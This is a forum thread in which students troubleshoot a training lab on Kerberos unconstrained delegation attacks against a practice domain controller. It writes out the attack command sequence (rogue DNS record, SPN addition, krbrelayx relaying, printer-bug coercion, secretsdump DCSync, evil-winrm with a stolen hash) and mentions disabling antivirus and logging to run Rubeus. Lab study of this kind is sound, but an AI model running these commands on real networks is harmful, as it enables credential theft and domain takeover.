Kerberos attacks

Alt_F4 · September 11, 2023, 4:32pm

hi all. I beg you, help me, encourage me to the correct answer. I am running the “KERBEROS ATTACKS” module. I ran into difficulties in the “Unconstrained Delegation - Users” section. I need help solving a task, maybe I’m doing something wrong or I misunderstood the task and am applying the data from the task

callum.dixon:C@lluMDIXON has an unrestricted delegation set, and carole.rose:jasmine has a universal write on top of callum.dixon. Using this information, try to compromise the domain and read the contents of C:\flag.txt on DC01.

so let’s go in order what I do

fake dns

I add to /etc/hosts roguecomputer.inlanefreight.local
python dnstool.py -u INLANEFREIGHT.LOCAL\\carole.rose -p jasmine -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.99.99.99 --action add 10.129.205.35

create the SPN of the target user (callum.dixon)

python addspn.py -u inlanefreight.local\\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

Run krbrelay.py with the password callum.dixon

python krbrelayx.py -p C@lluMDIXON

Run printerbug.py as carole.rose to get the ticket

python printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local
and I catch the carole.rose ticket in the session where krbrelayx.py is running

Exporting the ticket

export KRB5CCNAME=./DC01\$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache

I’m trying to reset hashes using secretdump.py to get the admin hash and I get an error

secretsdump.py -k -no-pass dc01.inlanefreight.local
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

Okay, we understand that it may not be possible to perform DCSync. So I thought about stealing the flag using SMB, but it didn’t work, I just got an error using the Kerberos ticket “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”. But if you connected with credentials, then naturally you got access, but not to the C drive :')
Please help me with the task.

tigerboy · September 11, 2023, 4:44pm

@Alt_F4 What command you are using to connect to 10.129.205.35 machine.? Could you please help me with this?

Alt_F4 · September 11, 2023, 4:52pm

hi @tigerboy, if you connect without a ticket, you can connect using credentials using the following command:

smbclient.py carole.rose@dc01.inlanefreight.local

But this will not give you anything, because we need to get the admin hash and we need to carry out an attack like in the section to reset the hashes.
if we add options (-k -no-pass) to the command above then we will get an error “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”

Alt_F4 · September 11, 2023, 5:06pm

Well, if we reset the hash for a specific user, we will get a combo of the errors above

secretsdump.py -k -no-pass dc01.inlanefreight.local -just-dc-user administrator
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

Alt_F4 · September 15, 2023, 11:02pm

@tigerboy Hello. I decided and pulled the flag. I had to combine the attack of this part and the previous task. I still don’t understand what the problem is with the Kerberos error in this module. In general, my solution is just take the admin hash from the previous task and try to connect using some kind of
impacket module. Good luck!

tigerboy · October 14, 2023, 7:45am

Have you made any changes into system before running above command. I am not receiving connection refused error in the response.

Alt_F4 · October 16, 2023, 9:50am

try adding additional options. Use -h to figure out what you need. Pay attention to the target and ip options

halfluke · December 2, 2023, 6:59pm

Same problems as you when trying to perform a DC Sync.
Used NT Hash from previous task in the end.
Anyone was able to complete this task following the instructions?

clpbr · December 5, 2023, 10:45pm

was anyone able to get the flag? i have the same problem? what is the alternative? i have tried 2 different impakcet tools ,but still not able to access dc01

halfluke · December 6, 2023, 12:18am

smbclient.py should work. Of course it’s not the intended way. I have tried to open an issue with Support about this task, asking them to investigate why DC Sync does not work

clpbr · December 6, 2023, 12:32am

Thanks for replying.

I tried using smbclient.py ,but ti didnt work. i use for administrator account from the last activity and for the dc01$ ,but none work. for carolone it gives no results back. May i ask you the syntax you used?
thank you

halfluke · December 6, 2023, 4:24am

replied privately

muskypirate · December 13, 2023, 7:13am

hey man, would you be able guide me with this? seems there is a tech issue and I am not sure what the dc ip is … is it the same ip mentioned in the example?

halfluke · December 20, 2023, 11:26pm

if I’m not wrong, the DC is the target machine itself so you just spin up the target and that is the IP to use

Fearnoevil7 · January 12, 2024, 3:53pm

When you issue the secretsdump command make sure you specify the -target-ip and the -dc-ip and the target domainname/user and it should work

If you try to issue the secrets dump command with just the domain name after adding it to the hosts file it will not work or atleast it didnt work for me unless i specified the -target-ip and the -dc-ip and in the excercise they are the same but you still have to specify both

she12165 · January 12, 2024, 4:37pm

Could you please pm me the command you used? Bc it didn’t work for me. Maybe I did smth wrong.

Fearnoevil7 · January 12, 2024, 8:12pm

Sent it to you!! Hopefully it works out for you! Let me know if you still need help.

Baudejas · February 29, 2024, 5:15pm

Does anybody know what the problem is? The commands execute successfully until krbrelayx.py -p C@lluMDIXON:

python dnstool.py -u INLANEFREIGHT.LOCAL\callum.dixon -p C@lluMDIXON -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.219 --action add 10.129.205.35

python addspn.py -u inlanefreight.local\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

python krbrelayx.py -p C@llumDIXON

and I get this error and no ticket:

this is my /etc/hosts file:

Baudejas · March 9, 2024, 10:19pm

Hello, I am trying to use Rubeus (not in HTB academy lab) , however I believe it is being detected by AV / EDR. When I double click on Rubeus it opens cmd and instantly closes. Using Rubeus from command line does not work as well.

I disabled Defender Real-Time protection & firewall on my student VM and used InviShell to bypass script block logging, but the problem remains. Does anybody know how to use Rubeus in this case?
Thanks

CrazyHorse302 · March 20, 2024, 1:31am

This one was pretty frustrating. I had to convert callum.dixon’s password into a ntlm hash, then run sudo python krbrelayx.py -hashes : with the hash, after that I finally recieved the TGT and then exported the ticket, I then was able to DCSync with secretsdump.py -k -no-pass dc01.inlanefreight.local and get the Administrator’s hash, from there I could use evil-winrm with the hash.